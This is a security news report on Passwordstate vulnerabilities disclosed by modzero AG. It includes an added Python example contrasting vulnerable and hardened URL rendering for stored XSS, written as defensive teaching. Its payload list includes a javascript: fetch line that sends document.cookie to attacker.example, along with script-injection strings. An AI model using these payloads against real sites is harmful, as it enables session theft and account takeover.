Multiple high-severity vulnerabilities have been disclosed in the Passwordstate password management solution that could be exploited by an unauthenticated remote adversary to obtain a user's plaintext passwords.
“Successful exploitation allows an unauthenticated attacker to exfiltrate passwords from an instance, overwrite all stored passwords within the database, or elevate their privileges within the application,” Swiss cybersecurity firm modzero AG said in a report published this week.
“Multiple individual vulnerabilities can be chained to gain a shell on the Passwordstate host system and dump all stored passwords in cleartext, starting with nothing more than a valid username.”
Passwordstate, developed by an Australian company named Click Studios, has over 29,000 customers and is used by more than 370,000 IT professionals.
One of the flaws also affects version 9.5.8.4 of the Passwordstate extension for the Chrome web browser. The latest version of the browser add-on is 9.6.1.2, which was released on September 7, 2022.
The list of vulnerabilities identified by modzero AG is below –
- CVE-2022-3875 (CVSS score: 9.1) – An authentication bypass for Passwordstate's API
- CVE-2022-3876 (CVSS score: 6.5) – A bypass of access controls via user-controlled keys
- CVE-2022-3877 (CVSS score: 5.7) – A stored cross-site scripting (XSS) vulnerability in the URL field of each password entry
- No CVE (CVSS score: 6.0) – An inadequate mechanism for securing passwords through the use of server-side symmetric encryption
- No CVE (CVSS score: 5.3) – Use of hard-coded credentials to list audited events such as password requests and user account changes via the API
- No CVE (CVSS score: 4.3) – Use of insufficiently protected credentials for Password Lists
Exploiting the vulnerabilities could allow an attacker with knowledge of a valid username to extract stored passwords in cleartext, overwrite the passwords in the database, and even elevate privileges to gain remote code execution.
What's more, an improper authorization flow (CVSS score: 3.7) identified in the Chrome browser extension could be weaponized to send all passwords to an actor-controlled domain.
In an attack chain demonstrated by modzero AG, a threat actor could forge an API token for an administrator account and exploit the XSS flaw to add a malicious password entry, obtain a reverse shell, and capture the passwords hosted in the instance.
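The stored XSS in the URL field is the pivot of the chain above: a URL that is written into a page without scheme validation or output encoding becomes a script sink for whoever later opens that entry. The following is an added, generic illustration (not Passwordstate or modzero code; the function names and the payloads are constructed for this example) of the vulnerable rendering pattern next to a hardened one that allowlists the scheme and escapes on output.

```python
"""Stored XSS via a URL field: vulnerable vs hardened rendering.

Constructed example for illustration only. The functions and payloads here
are assumptions, not the code of any real product.
"""
from html import escape
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Only web URLs may be turned into clickable links.
ALLOWED_SCHEMES = {"http", "https"}


def render_url_unsafe(url: str) -> str:
    """Vulnerable pattern: stored value interpolated straight into markup."""
    return f'<a href="{url}">{url}</a>'


def normalize_url(url: str) -> Optional[str]:
    """Return the URL if it has an http/https scheme and a host, else None.

    urlsplit lower-cases the scheme, so 'JavaScript:' is rejected as well.
    """
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return None
    if parts.scheme not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return parts.geturl()


def render_url_safe(url: str) -> str:
    """Hardened pattern: validate the scheme, then escape on output.

    Scheme validation stops javascript:/data: links; escaping stops a quote
    or angle bracket in the path from breaking out of the attribute.
    """
    clean = normalize_url(url)
    if clean is None:
        return "<span>(invalid URL)</span>"
    safe = escape(clean, quote=True)
    return f'<a href="{safe}" rel="noopener noreferrer">{safe}</a>'


# Constructed payloads of the kind that could be stored in a URL field.
PAYLOADS = [
    "https://intranet.example/login",
    'javascript:fetch("https://attacker.example/?c="+document.cookie)',
    "JavaScript:alert(1)",
    '"><img src=x onerror="alert(1)">',
    'https://intranet.example/"><script>alert(1)</script>',
]


def demo() -> Dict[str, Tuple[str, str]]:
    """Map each payload to (unsafe rendering, safe rendering)."""
    return {p: (render_url_unsafe(p), render_url_safe(p)) for p in PAYLOADS}


if __name__ == "__main__":
    for payload, (unsafe, safe) in demo().items():
        print("input :", payload)
        print("unsafe:", unsafe)
        print("safe  :", safe)
        print()
```

The two controls are independent: escaping alone would still emit a clickable `javascript:` link, and scheme validation alone would still let a quote in the path close the `href` attribute, which is why the hardened version applies both.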
Users are recommended to update to Passwordstate 9.6 – Build 9653, released on November 7, 2022, or a later version to mitigate the potential threats.
Passwordstate, in April 2021, fell victim to a supply chain attack that allowed the attackers to leverage the service's update mechanism to drop a backdoor on customers' machines.